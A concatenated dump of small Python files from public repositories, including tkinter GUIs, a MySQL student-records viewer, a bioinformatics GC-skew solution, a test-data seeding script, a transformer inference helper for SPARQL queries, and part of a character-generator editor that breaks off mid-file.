sample\n","repo_name":"nus-dbdesign-group22/realisticdata","sub_path":"app/generator_types/email.py","file_name":"email.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"20000980828","text":"#!/usr/bin/env python3\n\nimport datetime\n# you need python-notify2\nimport notify2\nimport time\n\ndef main():\n now = datetime.datetime.now()\n title = \"Time Notification\"\n if now.hour >= 23 or now.hour <= 4:\n contents = f\"It's {now.hour:02}:{now.minute:02} now!\"\n else:\n return\n noti = notify2.Notification(title, contents)\n # https://developer-old.gnome.org/notification-spec/#hints\n # transient: When set the server will treat the notification as transient and by-pass the server's persistence capability, if it should exist. \n noti.set_hint(\"transient\", True)\n noti.show()\n\n\nif __name__ == \"__main__\":\n notify2.init(\"sleep-timer\")\n main()\n","repo_name":"taoky/scripts","sub_path":"sleep-timer/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"85"} +{"seq_id":"33605268376","text":"def gc_genome_skew(dna):\n gc_skew=[]\n gc_diff=0\n \n for i in range(len(dna)):\n gc_skew.append(gc_diff)\n if dna[i]=='C':\n gc_diff-=1\n if dna[i]=='G':\n gc_diff+=1\n \n oric_list=[]\n min_value = min(gc_skew)\n \n for i in range(len(gc_skew)):\n if(gc_skew[i]==min_value):\n oric_list.append(i)\n \n return oric_list\n\ndef main():\n with open('datasets/rosalind_ba1f.txt') as input_file:\n dna = input_file.read().strip()\n \n oric_list = gc_genome_skew(dna)\n \n print(' '.join(list(map(str, oric_list))))\n \n with open('solutions/rosalind_ba1f.txt', 'w') as output_file:\n output_file.write(' '.join(list(map(str, oric_list))))\n \nif(__name__=='__main__'):\n main()","repo_name":"ChaoticMarauder/Project_Rosalind","sub_path":"Textbook/BA1F.py","file_name":"BA1F.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"74293499477","text":"import tkinter as tk\nfrom tkinter import ttk\nimport pymysql\n\nroot = tk.Tk()\ntree = ttk.Treeview(root)\ntree.pack()\n\ndb = pymysql.connect(\"localhost\", \"root\", \"123\", \"university\")\ncursor = db.cursor()\n\ndef student_department():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"DOB\", \"Department_name\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"DOB\", width=100)\n\ttree.column(\"Department_name\", width=150)\n\n\ttree.heading(\"#0\", text=\"Panther ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"DOB\", text=\"Birth year\")\n\ttree.heading(\"Department_name\", text=\"Department name\")\n\n\tsql ='''select Student.Panther_ID, Student.Name, Student.DOB, Department.Name\n\t\t\tfrom Student, Department\n\t\t\twhere Student.Department_ID = Department.Department_ID'''\n\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2]), str(result[i][3])))\n\n\ndef instructor_info():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"Department_ID\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"Department_ID\", width=100)\n\n\ttree.heading(\"#0\", text=\"Instructor ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"Department_ID\", text=\"Department ID\")\n\n\tsql = \"select * from Instructor\"\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2])))\t\n\n\ndef student_info():\n\ttree.delete(*tree.get_children())\n\n\ttree[\"columns\"] = (\"Name\", \"DOB\")\n\ttree.column(\"#0\", width=100)\n\ttree.column(\"Name\", width=100)\n\ttree.column(\"DOB\", width=100)\n\n\ttree.heading(\"#0\", text=\"Panther ID\")\n\ttree.heading(\"Name\", text=\"Name\")\n\ttree.heading(\"DOB\", text=\"Birth year\")\n\n\n\tsql = \"select * from Student\"\n\n\tcursor.execute(sql)\n\tresult = cursor.fetchall()\n\n\tfor i in range(0, len(result)):\n\t\ttree.insert(\"\", i, text=str(result[i][0]), values=(str(result[i][1]), str(result[i][2])))\n\n\n\nbtn1 = tk.Button(root, text=\"Student-Department\", command=student_department).pack()\nbtn2 = tk.Button(root, text=\"Instructor_info\", command=instructor_info).pack()\nbtn3 = tk.Button(root, text=\"Student_info\", command=student_info).pack()\n\nstudent_info()\n\nroot.mainloop()","repo_name":"Efaz95/CS_2302","sub_path":"HW8.py","file_name":"HW8.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"40305816201","text":"from subprocess import PIPE, STDOUT, run\nfrom src.config import ponto_entrada\n\n\ndef executa_comando(argumentos):\n try:\n comando = [\"python\", ponto_entrada]\n comando.extend(argumentos)\n return run(comando,\n stdout=PIPE,\n stderr=STDOUT,\n encoding=\"utf-8\").stdout.strip()\n except Exception:\n raise\n","repo_name":"douglasdcm/easy_db","sub_path":"tests/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"40021294900","text":"from tkinter import *\n \n \ngui = Tk ()\ngui.title(\"imegnus\")\n\n# gui.iconbitmap('icon.ico')\n# gui.geometry('600*300')\n#window size min and max\n\ngui.maxsize(width=1000,height=1000)\ngui.minsize(width=1000,height=1000)\n\n#funcation\ndef func():\n x=var.get()\n lbl.config(text = x,bg = \"green\")\n \n# create label\nlbl = Label(gui,text = \"username\",bg=\"red\",fg=\"black\")#use funcation opctionl\n# first opctionl(pack,gride,place)\n\nlbl.place(x= 10,y=10)\n# con = StringVar()\nlbl = Label(gui,text = \"nathing\",bg=\"black\",fg=\"white\")#show data on display\nlbl.place(x= 40,y=120)\n\n#entrybox\nvar = StringVar()\nent = Entry(gui,bg = \"red\",fg = \"black\",bd = \"5\",textvariable=var)\nent.place(x=80,y=10)\n\n# buttion\nbtn = Button(gui,text=\"submit\",bg = \"green\",command=func) \nbtn.place(x=60,y=60)\n\ngui.mainloop()","repo_name":"python-hacked/Tkinter-Gui","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"85"} +{"seq_id":"71783911318","text":"import json\nimport pandas as pd\nimport numpy as np\nfrom torch.utils.data import DataLoader\nimport torch\nCUDA = torch.cuda.is_available()\n\nprint(f\"IS CUDA AVAILABLE: {CUDA}\")\n\nclass TransformerInference:\n def __init__(\n self, model, tree_transform, pipeline_inverse, scalerx, maxcardinality\n ):\n self.tree_transform = tree_transform\n self.model = model\n if CUDA:\n self.model = self.model.cuda()\n self.pipeline_inverse = pipeline_inverse\n self.scalerx = scalerx\n self.maxcardinality = maxcardinality\n \n\n def pred2index_dict(self, x, pred_to_index, maxcardinality):\n resp = {}\n x = json.loads(x)\n for el in x.keys():\n if el in pred_to_index:\n resp[pred_to_index[el]] = float(x[el]) / maxcardinality\n return resp\n\n def prepare_query_level_data(\n self, x_test_query\n ):\n \"\"\"\n Apply StandardScaller to columns except for json_cardinality that need other proccess\n \"\"\"\n # Scale x_query data.\n xqtest = x_test_query.drop(columns=[\"json_cardinality\"])\n x_test_scaled = self.scalerx.transform(xqtest)\n x_test_query = pd.concat(\n [\n pd.DataFrame(x_test_scaled, index=xqtest.index, columns=xqtest.columns),\n x_test_query[[\"json_cardinality\"]],\n ],\n axis=1,\n )\n x_test_query[\"json_cardinality\"] = x_test_query[\"json_cardinality\"].apply(\n lambda x: self.pred2index_dict(\n x, self.tree_transform.get_pred_index(), self.maxcardinality\n )\n )\n\n return x_test_query\n\n \n def prepare_query_level_data_no_jc(\n self, x_test_query\n ):\n \"\"\"\n Apply StandardScaller to columns except for json_cardinality that need other proccess\n \"\"\"\n # Scale x_query data.\n xqtest = x_test_query.copy()\n x_test_scaled = self.scalerx.transform(xqtest)\n x_test_query = pd.DataFrame(x_test_scaled, index=xqtest.index, columns=xqtest.columns)\n \n\n return x_test_query\n \n \n def fix_tree(self, tree):\n \"\"\"\n Trees in data must include in first position join type follow by predicates of childs. We check and fix this.\n \"\"\"\n try:\n if len(tree) == 1:\n assert isinstance(tree[0], str)\n return tree\n else:\n assert len(tree) == 3\n assert isinstance(tree[0], str)\n preds = []\n if len(tree[0].split(\"ᶲ\")) == 1:\n\n tree_left = self.fix_tree(tree[1])\n preds.extend(tree_left[0].split(\"ᶲ\")[1:])\n\n tree_right = self.fix_tree(tree[2])\n preds.extend(tree_right[0].split(\"ᶲ\")[1:])\n preds = list(set(preds))\n tree[0] = tree[0] + \"ᶲ\" + \"ᶲ\".join(preds)\n return tree\n else:\n return tree\n\n except Exception as ex:\n print(tree)\n return tree\n\n def json_loads(self, X, X_query):\n respX = []\n respX_query = []\n for x_tree, x_query in list(zip(X, X_query)):\n try:\n x_tree = json.loads(x_tree)\n respX.append(x_tree)\n respX_query.append(x_query)\n except:\n print(\"Error in data ignored!\", x_tree, x_query)\n return respX, respX_query\n\n def index2sparse(self, tree, sizeindexes):\n resp = []\n for el in tree:\n if type(el[0]) == tuple:\n resp.append(self.index2sparse(el, sizeindexes))\n else:\n a = np.array(el)\n b = np.zeros((a.size, sizeindexes))\n b[np.arange(a.size), a] = 1\n onehot = np.sum(b, axis=0, keepdims=True)[0]\n resp.append(onehot)\n return tuple(resp)\n\n def collate_with_card(self, x):\n \"\"\"\n Preprocess inputs values, transform index2vec values,\n them predict aec.encoder to dimensionality reduction\n \"\"\"\n trees = []\n sizeindexes = len(self.tree_transform.get_pred_index())\n\n for tree, query_data in x:\n b = np.zeros((sizeindexes))\n try:\n for key in query_data[-1].keys():\n b[key] = query_data[-1][key]\n except Exception as ex:\n print(ex)\n print(tree)\n print(\"Error en cardinalidades\", str(query_data[-1]))\n trees.append(\n tuple(\n [\n self.index2sparse(tree, sizeindexes),\n np.concatenate([query_data[:-1], b]).tolist(),\n ]\n )\n )\n return trees\n\n def collate(self, x):\n #print(\"NeoRegression, collate method active\")\n \"\"\"Preprocess inputs values, transform index2vec values, them predict aec.encoder to dimensionality reduction\"\"\"\n trees = []\n targets = []\n sizeindexes = len(self.tree_transform.get_pred_index())\n for tree, query_data in x:\n trees.append(tuple([self.index2sparse(tree, sizeindexes), query_data]))\n return trees\n \n \n def prepare_with_card(self, x_test_tree, x_test_query):\n x_test_query = self.prepare_query_level_data(x_test_query)\n\n Xt, Xq = self.json_loads(x_test_tree, x_test_query.values)\n Xt = [self.fix_tree(x) for x in Xt]\n Xt = self.tree_transform.transform(Xt)\n pairs_val = list(zip(Xt, Xq))\n dataset_val = DataLoader(\n pairs_val,\n batch_size=64,\n num_workers=0,\n shuffle=False,\n collate_fn=self.collate_with_card,\n )\n return dataset_val\n \n def prepare(self, x_test_tree, x_test_query):\n x_test_query = self.prepare_query_level_data_no_jc(x_test_query)\n\n Xt, Xq = self.json_loads(x_test_tree, x_test_query.values)\n Xt = [self.fix_tree(x) for x in Xt]\n Xt = self.tree_transform.transform(Xt)\n pairs_val = list(zip(Xt, Xq))\n dataset_val = DataLoader(\n pairs_val,\n batch_size=64,\n num_workers=0,\n shuffle=False,\n collate_fn=self.collate,\n )\n return dataset_val\n\n def getpredictions_info(self, dataset_val):\n results = []\n results_extend = []\n for x in dataset_val:\n results_val = self.model(x)\n results.append(\n self.pipeline_inverse.inverse_transform(\n results_val.cpu().detach().numpy()\n ).tolist()\n )\n results_extend.extend(\n self.pipeline_inverse.inverse_transform(\n results_val.cpu().detach().numpy()\n ).tolist()\n )\n \n return results, results_extend\n","repo_name":"ccarmonar/memoria_utfsm_deep_learning_models","sub_path":"sparql_neo_RL/functions/transform_inference.py","file_name":"transform_inference.py","file_ext":"py","file_size_in_byte":7005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"9238323110","text":"\n'''\nseed_files.py audio \n\n^^ seed files from command line \n'''\nimport sys, uuid, os, shutil, time, random\nimport sounddevice as sd \nimport pandas as pd \nimport soundfile as sf \nimport pyautogui, markovify \n\ndef audio_record(filename, duration, fs, channels):\n print('---------------')\n print('recording audio...')\n myrecording = sd.rec(int(duration * fs), samplerate=fs, channels=channels)\n sd.wait()\n sf.write(filename, myrecording, fs)\n print('done recording %s'%(filename))\n print('---------------')\n\ndef text_record(filename, text_model):\n\n textfile=open(filename, 'w')\n # Print five randomly-generated sentences\n for i in range(5):\n sentence=text_model.make_sentence()\n textfile.write(sentence)\n\n textfile.close()\n\ndef image_record(filename):\n pyautogui.screenshot(filename)\n\ndef video_record(filename, test_dir, train_dir):\n print('---------------')\n print('recording video...')\n cur_dur=os.getcwd()\n os.chdir(test_dir+'/helpers/video_record')\n # 3 second recordings \n os.system('python3 record.py %s 3 %s'%(filename, train_dir))\n os.chdir(cur_dir)\n print('---------------')\n\ndef csv_record(filename, newfilename):\n # take in test .CSV and manipulate the columns by copy/paste and re-write \n csvfile=pd.read_csv(filename)\n filelength=len(filename)\n newlength=random.randint(0,filelength-1)\n\n # now re-write CSV with the new length \n g=csvfile.iloc[0:newlength]\n randint2=random.randint(0,1)\n if randint2 == 0:\n g=g+g \n g.to_csv(newfilename)\n\ndef prev_dir(directory):\n g=directory.split('/')\n dir_=''\n for i in range(len(g)):\n if i != len(g)-1:\n if i==0:\n dir_=dir_+g[i]\n else:\n dir_=dir_+'/'+g[i]\n # print(dir_)\n return dir_\n\n# get filetype from command line \nfiletype=sys.argv[1]\ntrain_dir=sys.argv[2]\ncur_dir=os.getcwd()\n\ntry:\n os.chdir(train_dir)\nexcept:\n os.mkdir(train_dir)\n\nos.chdir(cur_dir)\n# prevdir=prev_dir(cur_dir)\n# prevdir=os.getcwd()\n\nif filetype == 'audio':\n\n '''\n sample command in terminal:\n python3 seed_files.py audio /Users/jimschwoebel/allie/train_dir/one\n '''\n \n # load test data directory \n if train_dir.endswith('one'):\n data_dir=cur_dir+'/helpers/audio_data/one'\n elif train_dir.endswith('two'):\n data_dir=cur_dir+'/helpers/audio_data/two'\n\n listdir=os.listdir(data_dir)\n # print(data_dir)\n # option 1 - copy test files\n # --------------------------\n for i in range(len(listdir)):\n if listdir[i][-4:]=='.wav':\n print(listdir[i])\n shutil.copy(data_dir+'/'+listdir[i], train_dir+'/'+listdir[i])\n \n # option 2 - record data yourself (must be non-silent data)\n # --------------------------\n # for i in range(20):\n # filename=str(uuid.uuid4())+'.wav'\n # audio_record(filename, 1, 16000, 1)\nelif filetype == 'text':\n '''\n python3 seed_files.py text /Users/jimschwoebel/allie/train_dir/one\n '''\n # Get raw text as string (the Brother's Karamazov)\n with open(cur_dir+'/helpers/text.txt') as f:\n text = f.read()\n # Build the model.\n text_model = markovify.Text(text)\n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.txt'\n text_record(filename, text_model)\n\nelif filetype == 'image':\n '''\n python3 seed_files.py image /Users/jimschwoebel/allie/train_dir/one\n '''\n # take 20 random screenshots with pyscreenshot\n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.png'\n image_record(filename)\n\nelif filetype == 'video':\n '''\n python3 seed_files.py video /Users/jimschwoebel/allie/train_dir/one\n '''\n # make 20 random videos with screenshots \n os.chdir(train_dir)\n for i in range(20):\n filename=str(uuid.uuid4()).replace('-','_')+'.avi'\n video_record(filename, cur_dir, train_dir)\n\nelif filetype == 'csv':\n '''\n python3 seed_files.py csv /Users/jimschwoebel/allie/train_dir/one\n '''\n # prepopulate 20 random csv files with same headers \n filename='test_csv.csv'\n shutil.copy(cur_dir+'/'+filename, train_dir+'/'+filename)\n os.chdir(train_dir)\n for i in range(20):\n newfilename=str(uuid.uuid4())+'.csv'\n csv_record(filename, newfilename)\n os.remove(filename)\n","repo_name":"jim-schwoebel/allie","sub_path":"tests/seed_files.py","file_name":"seed_files.py","file_ext":"py","file_size_in_byte":4407,"program_lang":"python","lang":"en","doc_type":"code","stars":128,"dataset":"github-code","pt":"85"} +{"seq_id":"23265018756","text":"\n# Given a binary tree, find its maximum depth.\n\n# The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\n# Note: A leaf is a node with no children.\n\n# Example:\n\n# Given binary tree [3,9,20,null,null,15,7],\n\n# 3\n# / \\\n# 9 20\n# / \\\n# 15 7\n# return its depth = 3.\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n if not root: return 0\n queue= [root]\n depth = 1\n while queue:\n queue1 = []\n for node in queue:\n if node.left:\n queue1.append(node.left)\n if node.right:\n queue1.append(node.right)\n queue = queue1\n \n depth += 1\n return depth-1\n\n# Time: O(n)\n# Space: O(n)\n# Difficulty: medium","repo_name":"wenxinjie/leetcode","sub_path":"tree/python/leetcode104_Maximum_Depth_of_Binary_Tree.py","file_name":"leetcode104_Maximum_Depth_of_Binary_Tree.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"36405964491","text":"responses = {}\n\nname_prompt = \"what's your name? \"\nplace_prompt = \"If you could visit one place in the world, where would you go? \"\ncontinue_prompt = \"Would you like to let another person respond?(Y/N) \"\n\nwhile True:\n\tname = input(name_prompt)\n\tplace = input(place_prompt)\n\n\tresponses[name] = place\n\n\trepeat = input(continue_prompt)\n\tif repeat != 'Y':\n\t\tbreak\n\nprint(\"\\n--- Poll Results ---\")\nfor name, place in responses.items():\n\tprint(name.title() + \"'s favorite place is \" + place.title() + \".\")\n","repo_name":"julie98/Python-Crash-Course","sub_path":"chapter_7/dream_vacation.py","file_name":"dream_vacation.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"34611204638","text":"from functools import partial\nimport tkinter as tk\nimport tkinter.filedialog as file\nimport tkinter.messagebox as messagebox\nimport os\n\nInfoText = \"\"\"Character Generator v.b.3\nbuild on May 16th, 2023\nby Gabriel Weingardt\n\nFeel free to modify ;)\ngithub.com/0xMAC8205\n\nKnown issues:\n> Draw Box Applying when\n selecting a Character box\"\"\"\n\nToDo = \"\"\"\n- Correct 8x16 Char Export\n\"\"\"\n\n\nclass Main(tk.Tk):\n def __init__(self, mode, carry_file, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.protocol(\"WM_DELETE_WINDOW\", self.exit_protocol)\n self.Path = os.path.abspath(os.path.dirname(__file__)).replace(\"\\\\\", \"/\") + \"/assets\"\n\n self.Mode = mode\n self.X_Select = 0\n self.Y_Select = 0\n\n self.BrushVar = tk.IntVar()\n self.Size = tk.IntVar()\n self.Grid = tk.IntVar()\n self.Drag = tk.IntVar()\n self.Wrap = tk.IntVar()\n self.Hint = tk.IntVar()\n self.Tooltip = tk.IntVar()\n self.ProjectSize = tk.IntVar()\n self.BrushVar.set(2)\n self.ProjectSize.set(0)\n\n self.background = \"#FFFFFF\"\n self.foreground = \"#000000\"\n self.draw_off = \"#FFFFFF\"\n self.draw_on = \"#000000\"\n self.font = \"Arial 12 bold\"\n\n self.Copy = [0 for _ in range(16)]\n\n self.X_Text = []\n self.Y_Text = []\n\n self.File_Formats = []\n\n self.CurrentFile = \"\"\n\n try:\n self.Preset = open(self.Path + \"/settings/settings\", \"rb\")\n\n self.Size.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Grid.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Drag.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Wrap.set(int.from_bytes(self.Preset.read(1), \"big\"))\n self.Hint.set(int.from_bytes(self.Preset.read(1), \"big\"))\n\n self.Preset.close()\n\n for i in os.listdir(self.Path + \"/custom_formats\"):\n if len(i) > 3 and not i[0] == \".\":\n self.File_Formats.append(i)\n\n self.Format = open(self.Path + \"/settings/theme.txt\", \"r\")\n self.import_code(self.Format.read().splitlines())\n self.Format.close()\n\n except Exception as e:\n print(\"Error in Reading Settings:\\n\", e)\n open(self.Path + \"/settings/settings\", \"w\").close()\n\n self.BrushVar.set(2)\n self.Size.set(16)\n self.Grid.set(1)\n self.Drag.set(1)\n self.Wrap.set(0)\n self.Hint.set(0)\n\n open(self.Path + \"/settings/theme.txt\", \"w\").close()\n\n self.config(bg=self.background)\n\n self.Matrix = []\n self.Characters = {}\n\n self.UpperFrame = tk.Frame(master=self, bg=self.background)\n self.UpperFrame.pack(side=\"top\", fill=\"both\", expand=0)\n self.Frame = tk.Frame(master=self, bg=self.background)\n self.Frame.pack(side=\"bottom\", fill=\"y\", expand=0)\n self.LowerFrame = tk.Frame(master=self.Frame, bg=self.background)\n self.LowerFrame.pack(side=\"bottom\")\n self.InfoBox = tk.Frame(master=self.Frame, bg=self.background)\n self.InfoBox.pack(side=\"bottom\")\n\n self.Options = tk.LabelFrame(master=self.LowerFrame, bg=self.background, fg=self.foreground,\n text=\"Options:\", font=self.font,)\n self.Options.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n self.DrawFrame = tk.Frame(master=self.LowerFrame, bg=self.background)\n self.DrawFrame.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n self.Toolbox = tk.LabelFrame(master=self.LowerFrame, bg=self.background, fg=self.foreground,\n text=\"Brush:\", font=self.font)\n self.Toolbox.pack(side=\"right\", anchor=\"s\", expand=0, fill=\"y\")\n\n self.CurrentCoord = tk.Label(master=self.InfoBox, text=\"Char: 0 | 0x00\", bg=self.background,\n foreground=self.foreground, font=self.font)\n self.CurrentCoord.pack()\n\n self.Draw = DrawBox(master=self.DrawFrame, bg=self.background, size=self.Size.get(), mode=self.Mode,\n background=self.draw_off, foreground=self.draw_on)\n self.Draw.pack()\n\n # Brush Options\n\n self.Brush_White = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=0, text=\"White\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Black = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=1, text=\"Black\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Invert = tk.Radiobutton(master=self.Toolbox, variable=self.BrushVar, value=2, text=\"Invert\",\n background=self.background, foreground=self.foreground,\n indicatoron=False, command=self.update_brush, font=self.font)\n self.Brush_Invert.pack(side=\"top\", expand=1, fill=\"both\")\n self.Brush_Black.pack(side=\"top\", expand=1, fill=\"both\")\n self.Brush_White.pack(side=\"top\", expand=1, fill=\"both\")\n\n # Options\n\n self.Invert_Button = tk.Button(master=self.Options, text=\"Invert\", command=self.Draw.invert_screen,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Clear_Button = tk.Button(master=self.Options, text=\"Clear\", command=self.Draw.clear_screen,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Apply_Button = tk.Button(master=self.Options, text=\"Apply\", command=self.apply,\n background=self.background, foreground=self.foreground, font=self.font)\n self.Clear_Button.pack(side=\"top\", expand=1, fill=\"both\")\n self.Invert_Button.pack(side=\"top\", expand=1, fill=\"both\")\n self.Apply_Button.pack(side=\"bottom\", expand=1, fill=\"both\")\n\n self.Menu = tk.Menu(self)\n self.Menu_File = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Options = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Settings = tk.Menu(self.Menu, tearoff=False)\n self.Menu_Export = tk.Menu(self.Menu_File, tearoff=False)\n self.Menu_Help = tk.Menu(self.Menu, tearoff=False)\n\n self.Menu_File.add_command(label=\"New Window\", accelerator=\"Control+N\",\n command=lambda: self.start_project(False))\n self.Menu_File.add_command(label=\"New Project\", accelerator=\"Shift+N\",\n command=lambda: self.start_project(True))\n self.Menu_File.add_separator()\n self.Menu_File.add_command(label=\"Open Project\", accelerator=\"Control+O\", command=self.open)\n self.Menu_File.add_command(label=\"Save Project\", accelerator=\"Control+S\", command=self.save)\n self.Menu_File.add_command(label=\"Save Project As\", accelerator=\"Control+Shift+S\", command=self.save_as)\n self.Menu_File.add_separator()\n self.Menu_File.add_cascade(label=\"Export\", menu=self.Menu_Export)\n self.Menu_File.add_separator()\n self.Menu_File.add_command(label=\"Close\", accelerator=\"Control+Q\", command=self.exit_protocol)\n\n self.Menu_Export.add_command(label=\"Assembler\", accelerator=\"Control+E\", command=lambda: self.export(\"asm\"))\n self.Menu_Export.add_command(label=\"C Include\", accelerator=\"Control+Shift+E\", command=lambda: self.export(\"c\"))\n self.Menu_Export.add_command(label=\"Raw Bytes\", command=lambda: self.export(\"out\"))\n\n \"\"\"\n if len(self.File_Formats) > 0:\n self.Menu_Export.add_separator()\n for i in self.File_Formats:\n if len(i) > 3:\n self.Menu_Export.add_command(label=i.split(\".\")[0],\n command=partial(self.export, \"custom\", type_carry=i))\n \"\"\"\n\n self.Menu_Options.add_command(label=\"Copy\", accelerator=\"Control+C\", command=self.copy)\n self.Menu_Options.add_command(label=\"Paste\", accelerator=\"Control+V\", command=self.paste)\n self.Menu_Options.add_separator()\n self.Menu_Options.add_command(label=\"Clear\", command=self.Draw.clear_screen, accelerator=\"Control+X\")\n self.Menu_Options.add_command(label=\"Invert\", command=self.Draw.invert_screen, accelerator=\"Control+Y\")\n self.Menu_Options.add_command(label=\"Apply\", command=self.apply, accelerator=\"Control+A\")\n\n self.Menu_Settings.add_checkbutton(label=\"Big Canvas\", variable=self.Size, onvalue=32, offvalue=16,\n command=self.update_draw, accelerator=\"Control+Plus\")\n self.Menu_Settings.add_checkbutton(label=\"Grid\", variable=self.Grid, onvalue=1, offvalue=0,\n command=self.update_draw, accelerator=\"Control+G\")\n self.Menu_Settings.add_checkbutton(label=\"Cursor Dragging\", variable=self.Drag, onvalue=1, offvalue=0,\n command=self.update_draw)\n self.Menu_Settings.add_separator()\n self.Menu_Settings.add_checkbutton(label=\"Coordinate Hints\", variable=self.Hint,\n onvalue=1, offvalue=0, command=self.update_draw)\n self.Menu_Settings.add_checkbutton(label=\"Cursor Wrapping\", variable=self.Wrap,\n onvalue=1, offvalue=0)\n\n self.Menu_Help.add_command(label=\"Creating a Theme\",\n command=lambda: FileViewer(self.Path + \"/create_theme.txt\"))\n # self.Menu_Help.add_command(label=\"Creating Custom Formats\",\n # command=lambda: FileViewer(self.Path + \"/format_help.txt\"))\n # self.Menu_Help.add_command(label=\"Importing Custom Formats\",\n # command=lambda: FileViewer(self.Path + \"/create_format.txt\"))\n self.Menu_Help.add_separator()\n self.Menu_Help.add_checkbutton(label=\"What is this?\", variable=self.Tooltip)\n self.Menu_Help.add_command(label=\"About\", command=self.about_menu)\n\n self.Menu.add_cascade(label=\"File\", menu=self.Menu_File)\n self.Menu.add_cascade(label=\"Options\", menu=self.Menu_Options)\n self.Menu.add_cascade(label=\"Settings\", menu=self.Menu_Settings)\n self.Menu.add_cascade(label=\"Help\", menu=self.Menu_Help)\n\n self[\"menu\"] = self.Menu\n\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n self.bind(\"\", self.cursor)\n\n self.bind(\"\", lambda _: self.apply())\n self.bind(\"\", lambda _: self.apply())\n self.bind(\"\", self.Draw.invert_screen)\n self.bind(\"\", self.Draw.clear_screen)\n self.bind(\"\", self.show_grid)\n\n self.bind(\"\", self.exit_protocol)\n self.bind(\"\", self.open)\n self.bind(\"\", self.save)\n self.bind(\"\", self.save_as)\n self.bind(\"\", lambda _: self.start_project(False))\n self.bind(\"\", lambda _: self.start_project(True))\n self.bind(\"\", lambda _: self.export(\"asm\"))\n self.bind(\"\", lambda _: self.export(\"c\"))\n\n self.bind(\"\", self.extend_draw)\n self.bind(\"\", self.copy)\n self.bind(\"\", self.paste)\n\n ToolTip(self.Brush_White, \"White Brush.\\nDraws white on selected field\")\n ToolTip(self.Brush_Black, \"Black Brush.\\nDraws black on selected field\")\n ToolTip(self.Brush_Invert, \"Inverted Brush.\\nInverts the selected field\")\n ToolTip(self.Invert_Button, \"Invert Button.\\nInverts the entire draw field\")\n ToolTip(self.Clear_Button, \"Clear Button.\\nClears the entire draw field\")\n ToolTip(self.Apply_Button, \"Apply Button.\\nSets the selected character \\nto the edited character\")\n ToolTip(self.CurrentCoord, \"Coordinate Label.\\nShows the index of selected \\ncharacter in Decimal and Hex\")\n ToolTip(self.DrawFrame, \"Draw field.\\nHere you can edit\\nthe selected character\")\n ToolTip(self.UpperFrame, \"Character list.\\nHere you select one of\\n256 characters to edit\")\n\n self.build_matrix()\n self.Draw.update_screen()\n self.update_draw()\n self.update_brush()\n\n if carry_file:\n self.open(in_file=carry_file)\n\n def exit_protocol(self, event=None):\n try:\n self.check_save_status()\n self.Preset = open(self.Path + \"/settings/settings\", \"wb\")\n self.Preset.write(self.Size.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Grid.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Drag.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Wrap.get().to_bytes(1, \"big\"))\n self.Preset.write(self.Hint.get().to_bytes(1, 